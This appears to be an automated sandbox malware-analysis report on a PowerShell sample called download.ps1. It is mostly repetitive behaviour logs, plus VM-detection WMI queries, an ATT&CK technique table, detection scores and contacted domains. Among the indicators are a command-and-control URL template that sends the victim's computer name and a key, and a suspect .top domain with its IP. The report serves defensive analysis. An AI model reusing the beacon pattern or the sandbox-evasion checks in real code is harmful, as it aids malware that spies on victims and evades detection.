Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9923Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000000.00000002.48236697992.000002C3E518C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC:\Windows\tracing%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.48229130309.000002C3DCF5C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000000.00000002.48208281286.000002C3CAB12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48236697992.000002C3E512D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.48208281286.000002C3CAB12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48236697992.000002C3E512D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000000.00000002.48237450709.000002C3E53A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.48237450709.000002C3E53A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: F.DMTF|Memory Device Mapped Addresses|000vmCI
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		1
Virtualization/Sandbox Evasion		OS Credential Dumping21
Security Software Discovery		Remote ServicesData from Local System1
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive12
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
download.ps111%VirustotalBrowse
download.ps15%ReversingLabsWin32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://$xf8o4gnevib316q/$17l8kfj5a4enoxz.php?id=$env:computername&key=$dzthxgyfaewj&s=5270%Avira URL Cloudsafe
http://www.micft.com/pki/certs/MicWinPCA_2010-07-06.crt00%Avira URL Cloudsafe
http://kcehmenjdibnmni.top0%Avira URL Cloudsafe
https://apis.google.comXz0%Avira URL Cloudsafe
http://www.microsoft.PKI/0%Avira URL Cloudsafe
http://www.microsoft.0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.191.100
truefalse
    		high
    kcehmenjdibnmni.top
    		45.61.136.138
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://www.google.com/false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://www.google.com/intl/en/about/products?tab=whpowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.48229130309.000002C3DCE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCECE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CCDDE000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/Licensepowershell.exe, 00000000.00000002.48229130309.000002C3DCCD3000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCECE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCF5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CCE8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCC61000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schema.org/WebPagepowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CDF67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE15A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE29E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CDF58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCECE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE28F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCF5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 